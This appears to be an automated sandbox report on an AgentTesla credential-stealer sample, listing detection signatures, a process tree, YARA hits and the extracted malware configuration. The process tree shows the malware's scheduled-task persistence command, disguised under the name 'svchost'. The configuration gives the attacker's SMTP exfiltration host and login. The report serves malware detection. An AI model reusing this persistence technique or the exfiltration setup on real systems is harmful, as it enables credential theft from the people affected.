Edit tour

Windows Analysis Report
LisectAVT_2403002A_29.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_29.exe
Analysis ID:	1482367
MD5:	e6a5050de4674c9280d6fb1a51456867
SHA1:	fde04fb3d905cf314a22836276bc668bfcef2e5a
SHA256:	1b479dc4d8b2e7b2ca7fcda6699835a14223bf7c1540d6100b98f6658c8c165f
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: MSBuild connects to smtp port

Sigma detected: RegAsm connects to smtp port

Sigma detected: Schedule system process

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Drops PE files with benign system names

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_29.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_29.exe" MD5: E6A5050DE4674C9280D6FB1A51456867)

cmd.exe (PID: 7012 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4092 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6772 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

svchost.exe (PID: 1808 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E6A5050DE4674C9280D6FB1A51456867)

jsc.exe (PID: 572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

jsc.exe (PID: 5740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

WerFault.exe (PID: 2572 cmdline: C:\Windows\system32\WerFault.exe -u -p 1808 -s 1044 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 5504 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3260 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: E6A5050DE4674C9280D6FB1A51456867)

CasPol.exe (PID: 6140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

RegAsm.exe (PID: 2016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 6704 cmdline: C:\Windows\system32\WerFault.exe -u -p 3260 -s 1212 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 5648 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 4344 cmdline: C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 5932 cmdline: C:\Windows\system32\WerFault.exe -pss -s 428 -p 3260 -ip 3260 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 7380 cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 7280 -ip 7280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 7684 cmdline: C:\Windows\system32\WerFault.exe -pss -s 572 -p 7572 -ip 7572 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E6A5050DE4674C9280D6FB1A51456867)

RegAsm.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSBuild.exe (PID: 7356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 7428 cmdline: C:\Windows\system32\WerFault.exe -u -p 7280 -s 1192 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E6A5050DE4674C9280D6FB1A51456867)

jsc.exe (PID: 7644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

RegAsm.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7724 cmdline: C:\Windows\system32\WerFault.exe -u -p 7572 -s 1204 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "cp8nl.hyperhost.ua", "Username": "royallog@fibraunollc.top", "Password": " 7213575aceACE@#$  "}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2525046983.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000021.00000002.3407099977.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2525046983.0000000002B39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.3406933731.00000000030B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2287115517.0000021D90C2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000002.3407099977.0000000002D09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.2287115517.0000021D9084F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.2390489517.00000214422A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000002.3409529944.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.3409529944.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000021.00000002.3407099977.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: LisectAVT_2403002A_29.exe PID: 6688	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 3260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 3260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 1808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 1808	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 1808	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 1808	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 2016	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2016	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jsc.exe PID: 572	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jsc.exe PID: 572	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 7280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7280	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 7280	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 7280	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MSBuild.exe PID: 7356	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7356	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 7572	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7572	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 7572	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 7652	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7652	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 47 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
31.2.svchost.exe.191113c5518.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.svchost.exe.191113c5518.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
31.2.svchost.exe.191113c5518.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.svchost.exe.1f24404c2a0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.svchost.exe.1f24404c2a0.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.svchost.exe.1f24404c2a0.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
24.2.svchost.exe.1705204e0d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.1705204e0d0.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
24.2.svchost.exe.1705204e0d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
31.2.svchost.exe.1911138aad0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.svchost.exe.1911138aad0.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
31.2.svchost.exe.1911138aad0.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.214522b6dd8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.214522b6dd8.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.svchost.exe.214522b6dd8.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
31.2.svchost.exe.1911138aad0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.svchost.exe.1911138aad0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
31.2.svchost.exe.1911138aad0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6df2f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dfa1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e02b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e0bd:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e127:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e199:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e22f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e2bf:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.svchost.exe.1f244086ce8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.svchost.exe.1f244086ce8.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.svchost.exe.1f244086ce8.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.2145227c390.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.2145227c390.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.svchost.exe.2145227c390.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
31.2.svchost.exe.191113c5518.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.svchost.exe.191113c5518.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
31.2.svchost.exe.191113c5518.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
24.2.svchost.exe.17052088b18.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.17052088b18.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
24.2.svchost.exe.17052088b18.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31759:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31875:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31951:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a77:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.svchost.exe.1f244086ce8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.svchost.exe.1f244086ce8.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.svchost.exe.1f244086ce8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
